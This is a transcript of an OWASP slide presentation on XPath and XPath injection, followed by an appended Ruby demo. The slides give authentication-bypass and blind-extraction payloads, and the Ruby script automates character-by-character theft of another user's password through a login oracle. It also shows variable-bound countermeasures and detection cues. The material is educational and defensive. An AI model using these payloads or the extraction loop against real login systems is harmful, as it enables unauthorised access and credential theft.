Presentation transcript

Slide 1: OWASP – XPath Injection overview
Roberto Suggi Liverani, Security Consultant, Security-Assessment.com
21 February 2008

Slide 2: Who am I?
Roberto Suggi Liverani, Security Consultant, CISSP, Security-Assessment.com
4+ years in information security, focusing on web application and network security
OWASP New Zealand leader

Slide 3: Agenda
Understanding XPath (the theory part):
- What is XPath?
- XPath syntax
- XPath predicates
- XPath location path
- XPath functions
XPath Injection (the fun part):
- XPath Injection (techniques and examples)
- Blind XPath Injection (techniques and examples)
- XPath Injection countermeasures

Slide 4: What is XPath?
- XPath is a query language for selecting nodes from an XML document.
- XPath models the XML document as a tree of nodes.
- There are some similarities between SQL and XPath.
- XPath 1.0 is a W3C Recommendation and is still the most widely used version; XPath 2.0 was released recently (January 2007).
- Many languages support XPath, including Java, JavaScript, the .NET Framework, PHP, Python, Perl and Ruby.

Slide 5: XPath nodes – an XML document from the XPath perspective (1/2)
(Node diagram from the slide; not reproduced in the transcript.)

Slide 6: An XML document from the XPath perspective (2/2)
Relationships of nodes:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
      <user>
        <username>root</username>
        <password>OAhhgg</password>
        <account>root</account>
      </user>
    </users>

Relationships:
- <user> is the parent of <username>, <password> and <account>.
- <username>, <password> and <account> are children of the element <user>.
- <username>, <password> and <account> are siblings (they have the same parent).
- <users> and <user> are ancestors of <username>, <password> and <account>.
- <username>, <password> and <account> are descendants of the element <users>.

Slide 7: XPath syntax (1/3)
XPath uses path expressions to select nodes or node-sets in an XML document. Path expression syntax is very similar to URI syntax and file-path syntax.
Selecting nodes: (table from the slide; not reproduced in the transcript.)

Slide 8: XPath syntax (2/3)
Example: (table from the slide; not reproduced in the transcript.)

Slide 9: XPath syntax – other query examples (3/3)
(Table from the slide; not reproduced in the transcript.)

Slide 10: XPath predicates
Predicates are used to find a specific node, or a node that contains a specific value. Predicates can use XPath operators, and they are always enclosed in square brackets.
(Table of predicate examples and operators from the slide; not reproduced in the transcript.)

Slide 11: XPath location path (1/2)
A location path is a special case of XPath expression. There are two types, absolute and relative:
- An absolute location path starts with a (forward) slash.
- A relative location path starts without a slash.
In both cases the location path consists of one or more steps, each separated by a slash.
Example of an absolute location path: /users/user/username
A step is composed of:
- an axis (defines the tree relationship between the selected nodes and the current node);
- a node test (identifies a node within an axis);
- zero or more predicates (to further refine the selected node-set).
The syntax for a location step is: axisname::nodetest[predicate]
There are several axis names that can be used. The most common are: ancestor, attribute, descendant, child.

Slide 12: XPath location path – examples (2/2)
(Table of location path examples from the slide, with wildcards and axis names highlighted; not reproduced in the transcript.)

Slide 13: XPath functions
XPath 2.0 shares its function library with XQuery 1.0 and XSLT 2.0. The functions cover strings, booleans, dates and times, error and trace, numbers, nodes, sequences, QNames, anyURI and the evaluation context.
(Short list of the most important functions from the slide; not reproduced in the transcript.)

Slide 14: XPath Injection (1/2)
Scenario: an authentication system that performs an XPath query. This is a standard authentication query, assembled by string concatenation from the request parameters. XPath element names and operators are case-sensitive, so the root element and the and operator are written here to match the document on slide 6:

    VB:
    Dim FindUserXPath As String
    FindUserXPath = "//users/user[username/text()='" & Request("Username") & "' and password/text()='" & Request("Password") & "']"

    C#:
    String FindUserXPath;
    FindUserXPath = "//users/user[username/text()='" + Request("Username") + "' and password/text()='" + Request("Password") + "']";

With Username = user and Password = password the XPath query becomes:

    //users/user[username/text()='user' and password/text()='password']

Slide 15: XPath Injection (2/2)
Both parameters are concatenated into the query; the examples inject through the Username parameter. The same attack logic as SQL injection applies to XPath. Because the XPath and operator binds more tightly than or, a predicate of the form A or B or (C and D) is true whenever B is true: the password part becomes irrelevant and the predicate matches ALL user nodes. This injection allows the attacker to bypass the authentication system.

Username = user' or '1'='1' or 'a'='a
Password = password

XPath query becomes:

    //users/user[username/text()='user' or '1'='1' or 'a'='a' and password/text()='password']

Note that the shorter payload user' or '1'='1 shown on the original slide produces username/text()='user' or ('1'='1' and password/text()='password'), which only matches a user named user or a user whose password is password; the second or above is what makes the password clause irrelevant for every node.

Note also the big difference between XML files and SQL databases: the lack of access control. XPath has no notion of privileges or per-table permissions, so once injection is possible the entire XML document can be queried and its data retrieved.

Slide 16: Blind XPath Injection (1/3)
Based on Amit Klein's white paper "Blind XPath Injection". XPath 1.0 has no comment syntax, so the attacker cannot comment out the rest of the expression as with -- in SQL; instead, or is used to neutralise the remaining conditions. (XPath 2.0 added (: ... :) comments, but that only helps if the application's XPath engine implements 2.0.)

Original XPath request:
Username = user
Password = password
XPath query becomes:

    //users/user[username/text()='user' and password/text()='password']

1) Extracting the XML file structure (confirming that a username node exists):
Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b
Password = password
XPath query becomes:

    //users/user[username/text()='jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()='password']

The login succeeds only if name() of the first username element is the string 'username', i.e. if such a node exists; the trailing 'a'='b' and password clause is always false and only absorbs the closing quote.

Slide 17: Blind XPath Injection (2/3)
2) If we have valid credentials for one user, we can append conditions to that TRUE login and use the result to extract other users' credentials from the document. In this scenario the login succeeds only if the first character of the first child of the second <user> element (its <username>, in the sample document above) is "a". If the document is pretty-printed, child::node()[position()=1] may select a whitespace text node instead; child::*[position()=1] selects the first child element regardless. Here AND must be used, so that every condition has to be true. Blind XPath injection can equally use the functions contains and string-length and related string functions.

Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1
Password = OAhhgg
XPath query becomes:

    //users/user[username/text()='root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1' and password/text()='OAhhgg']

Slide 18: Blind XPath Injection (3/3)
Other XML crawling techniques that can be used:
- Return the number of child nodes under all <user> elements:
    count(//user/child::node())
- Return true if the value of the first username element is 4 characters long:
    string-length(//username[position()=1]/child::node()[position()=1])=4
- Return true if the value of the first username element contains the string "r":
    contains(//username[position()=1]/child::node()[position()=1],"r")

Slide 19: XPath Injection countermeasures
Input validation: always filter input and escape output. Note that XPath 1.0 string literals have no escape sequence, so a value containing the quote character used as the delimiter cannot be escaped in place; reject it, or build the literal with concat().
Parameterisation: expressions passed to the XPath parser for dynamic execution at run time can be parameterised. The query can also be parameterised by creating an external file and using XQuery to query the file.
Precompiled XPath: use precompiled XPath. If you are using .NET, consider Daniel Cazzulino's Dynamic Context, which binds user input to XPath variables instead of concatenating it into the expression:

    XPathNodeIterator custData = XPathCache.Select(
        "//customer[@name=$name and @password=$password]",
        customersDocument,
        new XPathVariable("name", txtName.Text),
        new XPathVariable("password", txtPassword.Text));

Slide 20: Questions/Conclusion
Thank you!
roberto.suggi@security-assessment.com
The presentation can be downloaded here: http://malerisch.net/xpath_injection/xpath_injection.ppt

Slide 21: References – Misc.
- XPath, W3C: http://www.w3.org/TR/xpath
- Software – XPath Builder: http://www.bubasoft.net
- Blind XPath Injection – Amit Klein: http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf
- Avoid the dangers of XPath Injection: http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html

Slide 22: References
- Blind XPath Injection: http://www.owasp.org/index.php/Blind_XPath_Injection
- XPath Tutorial: http://www.w3schools.com/xpath/default.asp
- OWASP – Test XPath Injection: http://www.owasp.org/index.php/XPath_Injection_Testing_AoC
- Dynamic Context: http://weblogs.asp.net/cazzu/archive/2003/10/07/30888.aspx

Slide 23: References
- Signs on the sand – Mitigating XPath injection: http://www.tkachenko.com/blog/archives/000385.html
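The vulnerable lookup of slide 14, the precedence-sensitive bypass of slide 15, the blind extraction of slides 16 to 18 and the variable-binding countermeasure of slide 19, worked through end to end as an added example. This is not code from the talk: it uses Ruby's REXML XPath engine in place of the .NET code on the slides, and the two-user document, the character set and the 32-character length bound are assumptions made for the demo.

```ruby
require 'rexml/document'

# Constructed sample document (not the talk's): two users, written without
# whitespace between elements so that child::node()[1] is an element.
USERS_XML = '<users>' \
  '<user><username>root</username><password>OAhhgg</password><account>root</account></user>' \
  '<user><username>alice</username><password>s3cret</password><account>user</account></user>' \
  '</users>'
DOC = REXML::Document.new(USERS_XML)

# Slide 14: the query is assembled by string concatenation, so both
# parameters are injectable.
def find_user_vulnerable(username, password)
  xpath = "//users/user[username/text()='#{username}' and password/text()='#{password}']"
  REXML::XPath.match(DOC, xpath)
end

# Slide 19: the same lookup with user input bound to XPath variables
# ($u, $p); the values are never parsed as part of the expression.
def find_user_safe(username, password)
  xpath = '//users/user[username/text()=$u and password/text()=$p]'
  REXML::XPath.match(DOC, xpath, {}, { 'u' => username, 'p' => password })
end

# The only signal the application leaks: did the login succeed?
def login_ok?(username, password)
  !find_user_vulnerable(username, password).empty?
end

# Slide 15: the bypass payload. 'and' binds tighter than 'or', so for
# every <user> the predicate reads  false or true or (false and ...).
BYPASS_USERNAME = "x' or '1'='1' or 'a'='a"

# Slides 16-18: blind extraction. A valid credential keeps the 'and'
# chain true, so the login oracle answers yes/no questions about any node.
# `target` is an XPath expression such as //user[2]/password.
# CHARSET and MAX_LEN are assumptions for the demo.
CHARSET = [*'a'..'z', *'A'..'Z', *'0'..'9']
MAX_LEN = 32

def ask(valid_user, valid_pass, condition)
  login_ok?("#{valid_user}' and #{condition} and '1'='1", valid_pass)
end

def blind_extract(target, valid_user, valid_pass)
  # First learn the length with string-length(), then each character with substring().
  length = (1..MAX_LEN).find { |n| ask(valid_user, valid_pass, "string-length(#{target})=#{n}") }
  return nil if length.nil?
  (1..length).map do |i|
    CHARSET.find { |c| ask(valid_user, valid_pass, "substring(#{target},#{i},1)='#{c}'") } || '?'
  end.join
end

if __FILE__ == $PROGRAM_NAME
  puts "bypass payload matches #{find_user_vulnerable(BYPASS_USERNAME, 'x').size} user(s)"
  puts "slide's short payload matches #{find_user_vulnerable("user' or '1'='1", 'password').size} user(s)"
  puts "parameterised lookup matches #{find_user_safe(BYPASS_USERNAME, 'x').size} user(s)"
  puts "second user's password: #{blind_extract('//user[2]/password', 'root', 'OAhhgg')}"
end
```

Run it with ruby to see the three behaviours side by side: the bypass payload returns both user nodes, the slide's shorter payload returns none against this document (no user is called user and none has the password password), and the variable-bound query returns none for the same payload because the whole string is compared as a literal value. The blind loop issues one login per candidate length and per candidate character, which is also the traffic pattern a detection rule for this attack would key on: many logins from one source with a valid username and a rapidly changing, XPath-function-bearing payload.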